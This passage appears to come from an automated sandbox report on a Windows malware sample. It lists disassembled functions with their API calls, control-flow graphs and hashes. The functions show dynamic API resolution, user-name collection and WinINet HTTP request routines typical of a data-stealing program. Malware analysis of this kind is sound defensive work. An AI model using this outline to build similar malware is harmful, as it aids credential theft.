                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                  • StrCmpCA.SHLWAPI(?,0088C4D8), ref: 0040493A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                  • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,0088C548), ref: 00404DE8
                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                  • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                  • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                  • HttpOpenRequestA.WININET(00000000,0088C458,?,0088BFB8,00000000,00000000,00400100,00000000), ref: 00404B15
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 2402878923-2180234286
                                  • Opcode ID: 2fa3b394260d3a3ce02c259ddf44f2a63f4c64190c2de6d978015daa5b68762b
                                  • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                  • Opcode Fuzzy Hash: 2fa3b394260d3a3ce02c259ddf44f2a63f4c64190c2de6d978015daa5b68762b
                                  • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                  Function 00417850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocNameProcessUser
                                  • String ID:
                                  • API String ID: 1206570057-0
                                  • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                  • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                  • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                  • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                  Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                  • ExitProcess.KERNEL32 ref: 0040117E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                  • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                  • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                  • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6
                                  Function 00419C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,008563F8), ref: 00419C2D
                                  • GetProcAddress.KERNEL32(75900000,008566D8), ref: 00419C45
                                  • GetProcAddress.KERNEL32(75900000,00883C00), ref: 00419C5E
                                  • GetProcAddress.KERNEL32(75900000,00883B70), ref: 00419C76
                                  • GetProcAddress.KERNEL32(75900000,00883BA0), ref: 00419C8E
                                  • GetProcAddress.KERNEL32(75900000,00883B88), ref: 00419CA7
                                  • GetProcAddress.KERNEL32(75900000,00885A88), ref: 00419CBF
                                  • GetProcAddress.KERNEL32(75900000,00883BE8), ref: 00419CD7
                                  • GetProcAddress.KERNEL32(75900000,00883BB8), ref: 00419CF0
                                  • GetProcAddress.KERNEL32(75900000,00883C18), ref: 00419D08
                                  • GetProcAddress.KERNEL32(75900000,00883B58), ref: 00419D20
                                  • GetProcAddress.KERNEL32(75900000,008566F8), ref: 00419D39
                                  • GetProcAddress.KERNEL32(75900000,00856438), ref: 00419D51
                                  • GetProcAddress.KERNEL32(75900000,00856618), ref: 00419D69
                                  • GetProcAddress.KERNEL32(75900000,00856798), ref: 00419D82
                                  • GetProcAddress.KERNEL32(75900000,0088A300), ref: 00419D9A
                                  • GetProcAddress.KERNEL32(75900000,0088A168), ref: 00419DB2
                                  • GetProcAddress.KERNEL32(75900000,008859E8), ref: 00419DCB
                                  • GetProcAddress.KERNEL32(75900000,00856538), ref: 00419DE3
                                  • GetProcAddress.KERNEL32(75900000,0088A330), ref: 00419DFB
                                  • GetProcAddress.KERNEL32(75900000,0088A0A8), ref: 00419E14
                                  • GetProcAddress.KERNEL32(75900000,0088A318), ref: 00419E2C
                                  • GetProcAddress.KERNEL32(75900000,0088A1B0), ref: 00419E44
                                  • GetProcAddress.KERNEL32(75900000,00856578), ref: 00419E5D
                                  • GetProcAddress.KERNEL32(75900000,0088A1F8), ref: 00419E75
                                  • GetProcAddress.KERNEL32(75900000,0088A360), ref: 00419E8D
                                  • GetProcAddress.KERNEL32(75900000,0088A270), ref: 00419EA6
                                  • GetProcAddress.KERNEL32(75900000,0088A210), ref: 00419EBE
                                  • GetProcAddress.KERNEL32(75900000,0088A108), ref: 00419ED6
                                  • GetProcAddress.KERNEL32(75900000,0088A1C8), ref: 00419EEF
                                  • GetProcAddress.KERNEL32(75900000,0088A240), ref: 00419F07
                                  • GetProcAddress.KERNEL32(75900000,0088A348), ref: 00419F1F
                                  • GetProcAddress.KERNEL32(75900000,0088A0D8), ref: 00419F38
                                  • GetProcAddress.KERNEL32(75900000,00885470), ref: 00419F50
                                  • GetProcAddress.KERNEL32(75900000,0088A2E8), ref: 00419F68
                                  • GetProcAddress.KERNEL32(75900000,0088A078), ref: 00419F81
                                  • GetProcAddress.KERNEL32(75900000,00856598), ref: 00419F99
                                  • GetProcAddress.KERNEL32(75900000,0088A180), ref: 00419FB1
                                  • GetProcAddress.KERNEL32(75900000,008565D8), ref: 00419FCA
                                  • GetProcAddress.KERNEL32(75900000,0088A2B8), ref: 00419FE2
                                  • GetProcAddress.KERNEL32(75900000,0088A1E0), ref: 00419FFA
                                  • GetProcAddress.KERNEL32(75900000,008565F8), ref: 0041A013
                                  • GetProcAddress.KERNEL32(75900000,008561D8), ref: 0041A02B
                                  • LoadLibraryA.KERNEL32(0088A0C0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                  • LoadLibraryA.KERNEL32(0088A288,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                  • LoadLibraryA.KERNEL32(0088A090,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                  • LoadLibraryA.KERNEL32(0088A258,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                  • LoadLibraryA.KERNEL32(0088A2A0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                  • LoadLibraryA.KERNEL32(0088A0F0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                  • LoadLibraryA.KERNEL32(0088A120,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                  • LoadLibraryA.KERNEL32(0088A138,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                  • GetProcAddress.KERNEL32(75FD0000,00855FF8), ref: 0041A0DA
                                  • GetProcAddress.KERNEL32(75FD0000,0088A228), ref: 0041A0F2
                                  • GetProcAddress.KERNEL32(75FD0000,008836C0), ref: 0041A10A
                                  • GetProcAddress.KERNEL32(75FD0000,0088A150), ref: 0041A123
                                  • GetProcAddress.KERNEL32(75FD0000,008563B8), ref: 0041A13B
                                  • GetProcAddress.KERNEL32(73B30000,008857E0), ref: 0041A160
                                  • GetProcAddress.KERNEL32(73B30000,00856118), ref: 0041A179
                                  • GetProcAddress.KERNEL32(73B30000,00885A10), ref: 0041A191
                                  • GetProcAddress.KERNEL32(73B30000,0088A198), ref: 0041A1A9
                                  • GetProcAddress.KERNEL32(73B30000,0088A2D0), ref: 0041A1C2
                                  • GetProcAddress.KERNEL32(73B30000,00856018), ref: 0041A1DA
                                  • GetProcAddress.KERNEL32(73B30000,008561B8), ref: 0041A1F2
                                  • GetProcAddress.KERNEL32(73B30000,0088A438), ref: 0041A20B
                                  • GetProcAddress.KERNEL32(763B0000,00856338), ref: 0041A22C
                                  • GetProcAddress.KERNEL32(763B0000,008563D8), ref: 0041A244
                                  • GetProcAddress.KERNEL32(763B0000,0088A3F0), ref: 0041A25D
                                  • GetProcAddress.KERNEL32(763B0000,0088A3A8), ref: 0041A275
                                  • GetProcAddress.KERNEL32(763B0000,008561F8), ref: 0041A28D
                                  • GetProcAddress.KERNEL32(750F0000,00885AD8), ref: 0041A2B3
                                  • GetProcAddress.KERNEL32(750F0000,00885880), ref: 0041A2CB
                                  • GetProcAddress.KERNEL32(750F0000,0088A3D8), ref: 0041A2E3
                                  • GetProcAddress.KERNEL32(750F0000,00856038), ref: 0041A2FC
                                  • GetProcAddress.KERNEL32(750F0000,00856138), ref: 0041A314
                                  • GetProcAddress.KERNEL32(750F0000,00885AB0), ref: 0041A32C
                                  • GetProcAddress.KERNEL32(75A50000,0088A408), ref: 0041A352
                                  • GetProcAddress.KERNEL32(75A50000,00856158), ref: 0041A36A
                                  • GetProcAddress.KERNEL32(75A50000,00883740), ref: 0041A382
                                  • GetProcAddress.KERNEL32(75A50000,0088A420), ref: 0041A39B
                                  • GetProcAddress.KERNEL32(75A50000,0088A378), ref: 0041A3B3
                                  • GetProcAddress.KERNEL32(75A50000,00856218), ref: 0041A3CB
                                  • GetProcAddress.KERNEL32(75A50000,00856258), ref: 0041A3E4
                                  • GetProcAddress.KERNEL32(75A50000,0088A3C0), ref: 0041A3FC
                                  • GetProcAddress.KERNEL32(75A50000,0088A390), ref: 0041A414
                                  • GetProcAddress.KERNEL32(75070000,00856238), ref: 0041A436
                                  • GetProcAddress.KERNEL32(75070000,0088A858), ref: 0041A44E
                                  • GetProcAddress.KERNEL32(75070000,0088A9C0), ref: 0041A466
                                  • GetProcAddress.KERNEL32(75070000,0088A870), ref: 0041A47F
                                  • GetProcAddress.KERNEL32(75070000,0088A840), ref: 0041A497
                                  • GetProcAddress.KERNEL32(74E50000,00856278), ref: 0041A4B8
                                  • GetProcAddress.KERNEL32(74E50000,00856058), ref: 0041A4D1
                                  • GetProcAddress.KERNEL32(75320000,00856298), ref: 0041A4F2
                                  • GetProcAddress.KERNEL32(75320000,0088A948), ref: 0041A50A
                                  • GetProcAddress.KERNEL32(6F060000,008560D8), ref: 0041A530
                                  • GetProcAddress.KERNEL32(6F060000,00856078), ref: 0041A548
                                  • GetProcAddress.KERNEL32(6F060000,008562B8), ref: 0041A560
                                  • GetProcAddress.KERNEL32(6F060000,0088A888), ref: 0041A579
                                  • GetProcAddress.KERNEL32(6F060000,008562D8), ref: 0041A591
                                  • GetProcAddress.KERNEL32(6F060000,008560F8), ref: 0041A5A9
                                  • GetProcAddress.KERNEL32(6F060000,00856178), ref: 0041A5C2
                                  • GetProcAddress.KERNEL32(6F060000,008562F8), ref: 0041A5DA
                                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0041A5F1
                                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0041A607
                                  • GetProcAddress.KERNEL32(74E00000,0088AA38), ref: 0041A629
                                  • GetProcAddress.KERNEL32(74E00000,008836D0), ref: 0041A641
                                  • GetProcAddress.KERNEL32(74E00000,0088A900), ref: 0041A659
                                  • GetProcAddress.KERNEL32(74E00000,0088A828), ref: 0041A672
                                  • GetProcAddress.KERNEL32(74DF0000,00856098), ref: 0041A693
                                  • GetProcAddress.KERNEL32(6FAB0000,0088A810), ref: 0041A6B4
                                  • GetProcAddress.KERNEL32(6FAB0000,00856318), ref: 0041A6CD
                                  • GetProcAddress.KERNEL32(6FAB0000,0088A978), ref: 0041A6E5
                                  • GetProcAddress.KERNEL32(6FAB0000,0088A8A0), ref: 0041A6FD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                  • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                  • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                  • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52
                                  Function 00406280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1001 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1008 406314-406318 1001->1008 1009 40630d 1001->1009 1010 406509-406525 call 41a7a0 call 41a800 * 2 1008->1010 1011 40631e-406342 InternetConnectA 1008->1011 1009->1008 1030 406528-40652d 1010->1030 1013 406348-40634c 1011->1013 1014 4064ff-406503 InternetCloseHandle 1011->1014 1016 40635a 1013->1016 1017 40634e-406358 1013->1017 1014->1010 1019 406364-406392 HttpOpenRequestA 1016->1019 1017->1019 1021 4064f5-4064f9 InternetCloseHandle 1019->1021 1022 406398-40639c 1019->1022 1021->1014 1023 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1022->1023 1024 40639e-4063bf InternetSetOptionA 1022->1024 1026 406407-406427 call 41a740 call 41a800 * 2 1023->1026 1027 40642c-40644b call 418940 1023->1027 1024->1023 1026->1030 1035 4064c9-4064e9 call 41a740 call 41a800 * 2 1027->1035 1036 40644d-406454 1027->1036 1035->1030 1039 406456-406480 InternetReadFile 1036->1039 1040 4064c7-4064ef InternetCloseHandle 1036->1040 1044 406482-406489 1039->1044 1045 40648b 1039->1045 1040->1021 1044->1045 1048 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1044->1048 1045->1040 1048->1039
                                  APIs
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                  • StrCmpCA.SHLWAPI(?,0088C4D8), ref: 00406303
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                  • HttpOpenRequestA.WININET(00000000,GET,?,0088BFB8,00000000,00000000,00400100,00000000), ref: 00406385
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                  • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                  • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                  • InternetCloseHandle.WININET(00000000), ref: 00406503
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3074848878-2509457195
                                  • Opcode ID: c8a6f04fdac549dd7e3b25e171be04d87dad98b8dac672af1d85c5c8f489a90f
                                  • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                  • Opcode Fuzzy Hash: c8a6f04fdac549dd7e3b25e171be04d87dad98b8dac672af1d85c5c8f489a90f
                                  • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56
                                  Function 004117A0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160stringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1058 4117a0-4117cd call 41aad0 StrCmpCA 1061 4117d7-4117f1 call 41aad0 strtok_s 1058->1061 1062 4117cf-4117d1 ExitProcess 1058->1062 1065 4117f4-4117f8 1061->1065 1066 4119c2-4119cd call 41a800 1065->1066 1067 4117fe-411811 1065->1067 1069 411817-41181a 1067->1069 1070 41199e-4119bd strtok_s 1067->1070 1072 411821-411830 call 41a820 1069->1072 1073 411849-411858 call 41a820 1069->1073 1074 4118ad-4118be StrCmpCA 1069->1074 1075 4118cf-4118e0 StrCmpCA 1069->1075 1076 41198f-411999 call 41a820 1069->1076 1077 4118f1-411902 StrCmpCA 1069->1077 1078 411951-411962 StrCmpCA 1069->1078 1079 411970-411981 StrCmpCA 1069->1079 1080 411913-411924 StrCmpCA 1069->1080 1081 411932-411943 StrCmpCA 1069->1081 1082 411835-411844 call 41a820 1069->1082 1083 41185d-41186e StrCmpCA 1069->1083 1084 41187f-411890 StrCmpCA 1069->1084 1070->1065 1072->1070 1073->1070 1095 4118c0-4118c3 1074->1095 1096 4118ca 1074->1096 1097 4118e2-4118e5 1075->1097 1098 4118ec 1075->1098 1076->1070 1099 411904-411907 1077->1099 1100 41190e 1077->1100 1105 411964-411967 1078->1105 1106 41196e 1078->1106 1086 411983-411986 1079->1086 1087 41198d 1079->1087 1101 411930 1080->1101 1102 411926-411929 1080->1102 1103 411945-411948 1081->1103 1104 41194f 1081->1104 1082->1070 1091 411870-411873 1083->1091 1092 41187a 1083->1092 1093 411892-41189c 1084->1093 1094 41189e-4118a1 1084->1094 1086->1087 1087->1070 1091->1092 1092->1070 1110 4118a8 1093->1110 1094->1110 1095->1096 1096->1070 1097->1098 1098->1070 1099->1100 1100->1070 1101->1070 1102->1101 1103->1104 1104->1070 1105->1106 1106->1070 1110->1070
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcessstrtok_s
                                  • String ID: block
                                  • API String ID: 3407564107-2199623458
                                  • Opcode ID: b3dd8198764fe9467e4b2c8b9506a85e5c70b97dc7c09ae6ead8ebf8a0dcb198
                                  • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                  • Opcode Fuzzy Hash: b3dd8198764fe9467e4b2c8b9506a85e5c70b97dc7c09ae6ead8ebf8a0dcb198
                                  • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A
                                  Function 00415510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1111 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1127 41557c-415583 1111->1127 1128 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1127->1128 1129 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1127->1129 1145 4155bb-4155d2 call 41a8a0 call 41a800 1128->1145 1155 415693-4156a9 call 41aad0 StrCmpCA 1129->1155 1159 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1129->1159 1145->1155 1160 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1155->1160 1161 4156af-4156b6 1155->1161 1159->1155 1291 415ac3-415ac6 1160->1291 1164 4157da-41585f call 41aad0 StrCmpCA 1161->1164 1165 4156bc-4156c3 1161->1165 1184 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1164->1184 1185 415865-41586c 1164->1185 1170 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1165->1170 1171 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1165->1171 1170->1164 1171->1164 1271 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1171->1271 1184->1291 1192 415872-415879 1185->1192 1193 41598f-415a14 call 41aad0 StrCmpCA 1185->1193 1200 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1192->1200 1201 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1192->1201 1222 415a16-415a21 Sleep 1193->1222 1223 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 